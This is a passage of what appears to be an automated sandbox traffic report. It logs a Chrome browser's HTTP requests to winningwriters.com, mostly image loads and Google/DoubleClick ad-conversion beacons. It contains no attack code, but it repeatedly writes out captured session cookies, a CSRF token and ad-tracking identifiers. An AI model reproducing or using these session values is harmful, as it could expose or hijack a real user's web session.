text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlKHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://winningwriters.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: IDE=AHWqTUkDmVI5SI6spfg_4pFoLRycHAEiplKMEVcXvfQYs0XlPIWpOqdcPgyxfSfi
          Source: global trafficHTTP traffic detected: GET /assets/images/slideshow-pager.png HTTP/1.1Host: winningwriters.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=68a23f8a34142ed9726924749d028c23; exp_tracker=%7B%220%22%3A%22index%22%2C%22token%22%3A%228160ca4970df2539877f22e2d3c4243fbeccefd7bb6b769a4c4f2edf405c9604c6335ac7c49228a149ea57293e04f5b6%22%7D; exp_csrf_token=54b7e56e97f18f0cf878c6ac3ba70750cc3bb811; _gcl_au=1.1.325201710.1731960007; _rdt_uuid=1731960007977.814805a2-007a-47c4-a129-ea0a72736646; _gid=GA1.2.1788557778.1731960008; _dc_gtm_UA-216038-1=1; _fbp=fb.1.1731960008619.29400145611624610; _ga=GA1.1.723902191.1731960008; _ga_S2XE0RVPX9=GS1.1.1731960008.1.0.1731960013.55.0.0
          Source: global trafficHTTP traffic detected: GET /assets/images/slidecontrols.png HTTP/1.1Host: winningwriters.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=68a23f8a34142ed9726924749d028c23; exp_tracker=%7B%220%22%3A%22index%22%2C%22token%22%3A%228160ca4970df2539877f22e2d3c4243fbeccefd7bb6b769a4c4f2edf405c9604c6335ac7c49228a149ea57293e04f5b6%22%7D; exp_csrf_token=54b7e56e97f18f0cf878c6ac3ba70750cc3bb811; _gcl_au=1.1.325201710.1731960007; _rdt_uuid=1731960007977.814805a2-007a-47c4-a129-ea0a72736646; _gid=GA1.2.1788557778.1731960008; _dc_gtm_UA-216038-1=1; _fbp=fb.1.1731960008619.29400145611624610; _ga=GA1.1.723902191.1731960008; _ga_S2XE0RVPX9=GS1.1.1731960008.1.0.1731960013.55.0.0
          Source: global trafficHTTP traffic detected: GET /pagead/viewthroughconversion/1072733940/?random=1731960013577&cv=11&fst=1731960013577&bg=ffffff&guid=ON&async=1&gtm=45be4be0v9134294326za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081484&u_w=1280&u_h=1024&url=https%3A%2F%2Fwinningwriters.com%2F&hn=www.googleadservices.com&frm=0&tiba=Welcome%20to%20Winning%20Writers%20-%20Winning%20Writers&value=Wergle%20Flomp%20Humor%20Poetry%20Contest&npa=0&pscdl=noapi&auid=325201710.1731960007&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dslider_change%3Bevent_category%3DSlider%3Bevent_label%3DAd-Top&rfmt=3&fmt=4 HTTP/1.1Host: googleads.g.doubleclick.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlKHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: IDE=AHWqTUkDmVI5SI6spfg_4pFoLRycHAEiplKMEVcXvfQYs0XlPIWpOqdcPgyxfSfi
          Source: global trafficHTTP traffic detected: GET /pagead/1p-user-list/1072733940/?random=1731960013577&cv=11&fst=1731960000000&bg=ffffff&guid=ON&async=1&gtm=45be4be0v9134294326za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081484&u_w=1280&u_h=1024&url=https%3A%2F%2Fwinningwriters.com%2F&hn=www.googleadservices.com&frm=0&tiba=Welcome%20to%20Winning%20Writers%20-%20Winning%20Writers&value=Wergle%20Flomp%20Humor%20Poetry%20Contest&npa=0&pscdl=noapi&auid=325201710.1731960007&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dslider_change%3Bevent_category%3DSlider%3Bevent_label%3DAd-Top&rfmt=3&fmt=3&is_vtc=1&cid=CAQSKQCa7L7dSSZuYeQXg7zVXjDOs2NWq76UrUnPxMhDELtrFHg4lcXZP1m1&random=494036233&rmt_tld=0&ipr=y HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlKHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://winningwriters.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /assets/images/winningwriters.ico HTTP/1.1Host: winningwriters.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://winningwriters.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=68a23f8a34142ed9726924749d028c23; exp_tracker=%7B%220%22%3A%22index%22%2C%22token%22%3A%228160ca4970df2539877f22e2d3c4243fbeccefd7bb6b769a4c4f2edf405c9604c6335ac7c49228a149ea57293e04f5b6%22%7D; exp_csrf_token=54b7e56e97f18f0cf878c6ac3ba70750cc3bb811; _gcl_au=1.1.325201710.1731960007; _rdt_uuid=1731960007977.814805a2-007a-47c4-a129-ea0a72736646; _gid=GA1.2.1788557778.1731960008; _dc_gtm_UA-216038-1=1; _fbp=fb.1.1731960008619.29400145611624610; _ga=GA1.1.723902191.1731960008; _ga_S2XE0RVPX9=GS1.1.1731960008.1.0.1731960013.55.0.0; wwpopup=popupseen
          Source: global trafficHTTP traffic detected: GET /assets/fancybox/fancybox_sprite.png HTTP/1.1Host: winningwriters.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://winningwriters.com/assets/fancybox/jquery.fancybox.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=68a23f8a34142ed9726924749d028c23; exp_tracker=%7B%220%22%3A%22index%22%2C%22token%22%3A%228160ca4970df2539877f22e2d3c4243fbeccefd7bb6b769a4c4f2edf405c9604c6335ac7c49228a149ea57293e04f5b6%22%7D; exp_csrf_token=54b7e56e97f18f0cf878c6ac3ba70750cc3bb811; _gcl_au=1.1.325201710.1731960007; _rdt_uuid=1731960007977.814805a2-007a-47c4-a129-ea0a72736646; _gid=GA1.2.1788557778.1731960008; _dc_gtm_UA-216038-1=1; _fbp=fb.1.1731960008619.29400145611624610; _ga=GA1.1.723902191.1731960008; _ga_S2XE0RVPX9=GS1.1.1731960008.1.0.1731960013.55.0.0; wwpopup=popupseen
          Source: global trafficHTTP traffic detected: GET /pagead/1p-user-list/1072733940/?random=1731960013577&cv=11&fst=1731960000000&bg=ffffff&guid=ON&async=1&gtm=45be4be0v9134294326za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081484&u_w=1280&u_h=1024&url=https%3A%2F%2Fwinningwriters.com%2F&hn=www.googleadservices.com&frm=0&tiba=Welcome%20to%20Winning%20Writers%20-%20Winning%20Writers&value=Wergle%20Flomp%20Humor%20Poetry%20Contest&npa=0&pscdl=noapi&auid=325201710.1731960007&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dslider_change%3Bevent_category%3DSlider%3Bevent_label%3DAd-Top&rfmt=3&fmt=3&is_vtc=1&cid=CAQSKQCa7L7dSSZuYeQXg7zVXjDOs2NWq76UrUnPxMhDELtrFHg4lcXZP1m1&random=494036233&rmt_tld=0&ipr=y HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlKHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /assets/fancybox/fancybox_overlay.png HTTP/1.1Host: winningwriters.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://winningwriters.com/assets/fancybox/jquery.fancybox.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=68a23f8a34142ed9726924749d028c23; exp_tracker=%7B%220%22%3A%22index%22%2C%22token%22%3A%228160ca4970df2539877f22e2d3c4243fbeccefd7bb6b769a4c4f2edf405c9604c6335ac7c49228a149ea57293e04f5b6%22%7D; exp_csrf_token=54b7e56e97f18f0cf878c6ac3ba70750cc3bb811; _gcl_au=1.1.325201710.1731960007; _rdt_uuid=1731960007977.814805a2-007a-47c4-a129-ea0a72736646; _gid=GA1.2.1788557778.1731960008; _dc_gtm_UA-216038-1=1; _fbp=fb.1.1731960008619.29400145611624610; _ga=GA1.1.723902191.1731960008; _ga_S2XE0RVPX9=GS1.1.1731960008.1.0.1731960013.55.0.0
          Source: global trafficHTTP traffic detected: GET /assets/images/winningwriters.ico HTTP/1.1Host: winningwriters.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=68a23f8a34142ed9726924749d028c23; exp_tracker=%7B%220%22%3A%22index%22%2C%22token%22%3A%228160ca4970df2539877f22e2d3c4243fbeccefd7bb6b769a4c4f2edf405c9604c6335ac7c49228a149ea57293e04f5b6%22%7D; exp_csrf_token=54b7e56e97f18f0cf878c6ac3ba70750cc3bb811; _gcl_au=1.1.325201710.1731960007; _rdt_uuid=1731960007977.814805a2-007a-47c4-a129-ea0a72736646; _gid=GA1.2.1788557778.1731960008; _dc_gtm_UA-216038-1=1; _fbp=fb.1.1731960008619.29400145611624610; _ga=GA1.1.723902191.1731960008; _ga_S2XE0RVPX9=GS1.1.1731960008.1.0.1731960013.55.0.0; wwpopup=popupseen
          Source: global trafficHTTP traffic detected: GET /assets/fancybox/fancybox_sprite.png HTTP/1.1Host: winningwriters.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=68a23f8a34142ed9726924749d028c23; exp_tracker=%7B%220%22%3A%22index%22%2C%22token%22%3A%228160ca4970df2539877f22e2d3c4243fbeccefd7bb6b769a4c4f2edf405c9604c6335ac7c49228a149ea57293e04f5b6%22%7D; exp_csrf_token=54b7e56e97f18f0cf878c6ac3ba70750cc3bb811; _gcl_au=1.1.325201710.1731960007; _rdt_uuid=1731960007977.814805a2-007a-47c4-a129-ea0a72736646; _gid=GA1.2.1788557778.1731960008; _dc_gtm_UA-216038-1=1; _fbp=fb.1.1731960008619.29400145611624610; _ga=GA1.1.723902191.1731960008; _ga_S2XE0RVPX9=GS1.1.1731960008.1.0.1731960013.55.0.0; wwpopup=popupseen
          Source: global trafficHTTP traffic detected: GET /assets/fancybox/fancybox_overlay.png HTTP/1.1Host: winningwriters.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=68a23f8a34142ed9726924749d028c23; exp_tracker=%7B%220%22%3A%22index%22%2C%22token%22%3A%228160ca4970df2539877f22e2d3c4243fbeccefd7bb6b769a4c4f2edf405c9604c6335ac7c49228a149ea57293e04f5b6%22%7D; exp_csrf_token=54b7e56e97f18f0cf878c6ac3ba70750cc3bb811; _gcl_au=1.1.325201710.1731960007; _rdt_uuid=1731960007977.814805a2-007a-47c4-a129-ea0a72736646; _gid=GA1.2.1788557778.1731960008; _dc_gtm_UA-216038-1=1; _fbp=fb.1.1731960008619.29400145611624610; _ga=GA1.1.723902191.1731960008; _ga_S2XE0RVPX9=GS1.1.1731960008.1.0.1731960013.55.0.0; wwpopup=popupseen
          Source: global trafficHTTP traffic detected: GET /td/rul/1072733940?random=1731960022416&cv=11&fst=1731960022416&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be4be0v9134294326za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081484&u_w=1280&u_h=1024&url=https%3A%2F%2Fwinningwriters.com%2F&hn=www.googleadservices.com&frm=0&tiba=Welcome%20to%20Winning%20Writers%20-%20Winning%20Writers&value=Tom%20Howard%2FJohn%20H.%20Reid%20Fiction%20%26%20Essay%20Contest&npa=0&pscdl=noapi&auid=325201710.1731960007&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dslider_change%3Bevent_category%3DSlider%3Bevent_label%3DAd-Top HTTP/1.1Host: td.doubleclick.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlKHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://winningwriters.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: IDE=AHWqTUkDmVI5SI6spfg_4pFoLRycHAEiplKMEVcXvfQYs0XlPIWpOqdcPgyxfSfi
          Source: global trafficHTTP traffic detected: GET /pagead/viewthroughconversion/1072733940/?random=1731960022416&cv=11&fst=1731960022416&bg=ffffff&guid=ON&async=1&gtm=45be4be0v9134294326za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081484&u_w=1280&u_h=1024&url=https%3A%2F%2Fwinningwriters.com%2F&hn=www.googleadservices.com&frm=0&tiba=Welcome%20to%20Winning%20Writers%20-%20Winning%20Writers&value=Tom%20Howard%2FJohn%20H.%20Reid%20Fiction%20%26%20Essay%20Contest&npa=0&pscdl=noapi&auid=325201710.1731960007&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dslider_change%3Bevent_category%3DSlider%3Bevent_label%3DAd-Top&rfmt=3&fmt=4 HTTP/1.1Host: googleads.g.doubleclick.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlKHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://winningwriters.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: IDE=AHWqTUkDmVI5SI6spfg_4pFoLRycHAEiplKMEVcXvfQYs0XlPIWpOqdcPgyxfSfi
          Source: global trafficHTTP traffic detected: GET /pagead/viewthroughconversion/1072733940/?random=1731960022416&cv=11&fst=1731960022416&bg=ffffff&guid=ON&async=1&gtm=45be4be0v9134294326za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081484&u_w=1280&u_h=1024&url=https%3A%2F%2Fwinningwriters.com%2F&hn=www.googleadservices.com&frm=0&tiba=Welcome%20to%20Winning%20Writers%20-%20Winning%20Writers&value=Tom%20Howard%2FJohn%20H.%20Reid%20Fiction%20%26%20Essay%20Contest&npa=0&pscdl=noapi&auid=325201710.1731960007&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dslider_change%3Bevent_category%3DSlider%3Bevent_label%3DAd-Top&rfmt=3&fmt=4 HTTP/1.1Host: googleads.g.doubleclick.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlKHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: IDE=AHWqTUkDmVI5SI6spfg_4pFoLRycHAEiplKMEVcXvfQYs0XlPIWpOqdcPgyxfSfi
          Source: global trafficHTTP traffic detected: GET /pagead/1p-user-list/1072733940/?random=1731960022416&cv=11&fst=1731960000000&bg=ffffff&guid=ON&async=1&gtm=45be4be0v9134294326za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081484&u_w=1280&u_h=1024&url=https%3A%2F%2Fwinningwriters.com%2F&hn=www.googleadservices.com&frm=0&tiba=Welcome%20to%20Winning%20Writers%20-%20Winning%20Writers&value=Tom%20Howard%2FJohn%20H.%20Reid%20Fiction%20%26%20Essay%20Contest&npa=0&pscdl=noapi&auid=325201710.1731960007&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dslider_change%3Bevent_category%3DSlider%3Bevent_label%3DAd-Top&rfmt=3&fmt=3&is_vtc=1&cid=CAQSKQCa7L7dQ4fiNAV-TJoDwbZnO8i__X1rkTAfdUmcnFr_WOUT6uLJxqh8&random=2318126067&rmt_tld=0&ipr=y HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlKHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://winningwriters.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /pagead/1p-user-list/1072733940/?random=1731960022416&cv=11&fst=1731960000000&bg=ffffff&guid=ON&async=1&gtm=45be4be0v9134294326za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081484&u_w=1280&u_h=1024&url=https%3A%2F%2Fwinningwriters.com%2F&hn=www.googleadservices.com&frm=0&tiba=Welcome%20to%20Winning%20Writers%20-%20Winning%20Writers&value=Tom%20Howard%2FJohn%20H.%20Reid%20Fiction%20%26%20Essay%20Contest&npa=0&pscdl=noapi&auid=325201710.1731960007&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dslider_change%3Bevent_category%3DSlider%3Bevent_label%3DAd-Top&rfmt=3&fmt=3&is_vtc=1&cid=CAQSKQCa7L7dQ4fiNAV-TJoDwbZnO8i__X1rkTAfdUmcnFr_WOUT6uLJxqh8&random=2318126067&rmt_tld=0&ipr=y HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlKHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /td/rul/1072733940?random=1731960030432&cv=11&fst=1731960030432&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be4be0v9134294326za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081484&u_w=1280&u_h=1024&url=https%3A%2F%2Fwinningwriters.com%2F&hn=www.googleadservices.com&frm=0&tiba=Welcome%20to%20Winning%20Writers%20-%20Winning%20Writers&value=Subscribe%20to%20our%20free%20newsletter%20and%20access%20The%20Best%20Free%20Literary%20Contests&npa=0&pscdl=noapi&auid=325201710.1731960007&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dslider_change%3Bevent_category%3DSlider%3Bevent_label%3DAd-Top HTTP/1.1Host: td.doubleclick.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlKHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://winningwriters.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: IDE=AHWqTUkDmVI5SI6spfg_4pFoLRycHAEiplKMEVcXvfQYs0XlPIWpOqdcPgyxfSfi
          Source: global trafficHTTP traffic detected: GET /pagead/viewthroughconversion/1072733940/?random=1731960030432&cv=11&fst=1731960030432&bg=ffffff&guid=ON&async=1&gtm=45be4be0v9134294326za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081484&u_w=1280&u_h=1024&url=https%3A%2F%2Fwinningwriters.com%2F&hn=www.googleadservices.com&frm=0&tiba=Welcome%20to%20Winning%20Writers%20-%20Winning%20Writers&value=Subscribe%20to%20our%20free%20newsletter%20and%20access%20The%20Best%20Free%20Literary%20Contests&npa=0&pscdl=noapi&auid=325201710.1731960007&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dslider_change%3Bevent_category%3DSlider%3Bevent_label%3DAd-Top&rfmt=3&fmt=4 HTTP/1.1Host: googleads.g.doubleclick.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlKHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://winningwriters.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: IDE=AHWqTUkDmVI5SI6spfg_4pFoLRycHAEiplKMEVcXvfQYs0XlPIWpOqdcPgyxfSfi
          Source: global trafficHTTP traffic detected: GET /pagead/viewthroughconversion/1072733940/?random=1731960030432&cv=11&fst=1731960030432&bg=ffffff&guid=ON&async=1&gtm=45be4be0v9134294326za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081484&u_w=1280&u_h=1024&url=https%3A%2F%2Fwinningwriters.com%2F&hn=www.googleadservices.com&frm=0&tiba=Welcome%20to%20Winning%20Writers%20-%20Winning%20Writers&value=Subscribe%20to%20our%20free%20newsletter%20and%20access%20The%20Best%20Free%20Literary%20Contests&npa=0&pscdl=noapi&auid=325201710.1731960007&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dslider_change%3Bevent_category%3DSlider%3Bevent_label%3DAd-Top&rfmt=3&fmt=4 HTTP/1.1Host: googleads.g.doubleclick.netConnection: keep-aliveUser-Agent: 